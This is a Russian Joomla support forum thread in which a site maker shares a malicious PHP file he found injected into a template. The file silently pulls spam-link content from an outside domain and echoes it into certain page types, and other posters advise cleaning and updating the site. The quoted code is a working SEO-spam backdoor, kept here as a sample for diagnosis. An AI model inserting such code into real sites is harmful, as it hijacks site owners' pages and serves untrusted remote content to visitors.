Форум русской поддержки Joomla!® CMS
04.12.2016, 01:55:02 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Чужие ссылки

 (Прочитано 480 раз)
0 Пользователей и 1 Гость смотрят эту тему.
LadaDed
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« : 18.02.2016, 21:30:39 »

Поймал на сайте чужие ссылки.
Долго копал, не мог найти, откуда. Потом заметил, что у меня в разделе component перед жидоком стоит какой-то не понятный require_once
Он вызывает system.php (название -то какое!)
А там

Код
<?php
/* Это та самая блоха для Joomla, которую я поймал! */
 
$app=JFactory::getApplication();
$option5=$app->input->getCmd('option','');
$view5=$app->input->getCmd('view','');
$layout5=$app->input->getCmd('layout','');
$menu5=$app->getMenu();
$files = 'http://joomla.cv.ua/j32.txt';
$file_headers = @get_headers($files);
if(($menu5->getActive()==$menu5->getDefault())||($view5=='featured'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j07.txt");
$data = implode($content);
echo $data; }
if(($option5=='com_content')&&($view5=='category')&&($layout5!=='blog'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j08.txt");
$data = implode($content); echo $data; }
if(($option5=='com_content')&&($view5=='article'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j09.txt");
$data = implode($content); echo $data; }
if(($option5=='com_content')&&($layout5=='blog'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j10.txt");
$data = implode($content); echo $data; }
if (($option5=='com_content')&&($layout5=='default'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j11.txt");
$data = implode($content); echo $data; }
?>
 

т.е. это какой-то Украинец, из Кабо Верде сидит и пишет текстовые файлы с такими вот пакостями, а они потом у меня появляются.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #1 : 18.02.2016, 21:33:04 »

Взломали вас. Надо чистить сайтик. Какая версия Joomla?
Записан
LadaDed
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #2 : 18.02.2016, 22:13:57 »

Да это даже не ломали, а так просетапили. Версия 2.5 28
Там на хосте нельзя установить 3 - говорят, не хватит ресурса..
А меня позвали сайт делать, когда уже все было установлено и даже начато. Вот в шаблоне ict-novotela такая бяка.
Я то искал base64_decode даже sql прочесал. Ну, нету этих текстов и все! А они, оказывается, лежат вообще на другом адресе. Найдешь их, как-же!
Записан
dmitry_stas
Профи
********

Репутация: +794/-4
Offline Offline

Сообщений: 7738



« Ответ #3 : 18.02.2016, 22:19:44 »

если 2.5.28 с последними фиксами - то дыр в ней нет (скажем так пока не нашли Azn ), так что обновляться на Ж3 не очень обязательно. ну по крайней мере из-за этой причины. соответственно, либо взломали до обновления, и прост о пока не проявляли себя, либо 2.5.28, но последние фиксы безопасности не установили. тогда 2.5.28 дырявая.
Записан
LadaDed
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #4 : 18.02.2016, 22:34:27 »

Да, надо будет там все обновить..
Я как-то привык на Амиро все делать, Дорого, конечно, но зато все такие штуки-дрюки не моя проблема.
Если что-то глючит - в службу поддержки и пускай они там и морочатся.
Но это были интернет-магазины, потом для ресторана делал, Там народ с деньгами, Сами говорят - не надо нам экономии, надо быстро и надежно.
А тут небольшой сайтик, практически, знакомые попросили.
А скупой платит дважды.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2271



« Ответ #5 : 19.02.2016, 10:15:56 »

А скупой платит дважды.
Даже трижды.

Добавлю, что целевой взлом сайта делается крайне редко, сейчас это работает не так, как в лихих 90-х, сейчас программы ломают сайты тоннами. И ваш, скорее всего, не исключение. dmitry_stas правильно сказал, 2.5.28 вполне себе неплохая, но она редко используется в чистом виде. Обычно обвешана различными расширениями, через них и получают доступ.
Записан
dmitry_stas
Профи
********

Репутация: +794/-4
Offline Offline

Сообщений: 7738



« Ответ #6 : 19.02.2016, 11:39:41 »

та там даже без сторонних расширений может быть проблема. я имел в виду, что просто установленной 2.5.28 мало для уверенности в безопасности. там было еще 2 фикса безопасности выпущено, а версия не менялась при этом, потому что фиксы были выпущены когда поддержка 2.5 уже закончилась.
Записан
natalyaegorova
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 19


« Ответ #7 : 03.08.2016, 01:55:15 »

Ребят, ради бога, подскажите что делать. Поймала на сайте такую же вредоносную фигню с Joomla.cv.ua!  Как от него избавиться? Сайт третьи сутки "висит"! Прописался в шаблоне в файле system.php. ДЖ версия 3.4.8.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3476


skype aqaus.com


« Ответ #8 : 03.08.2016, 10:50:14 »

Удалять, лечить, обновлять.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet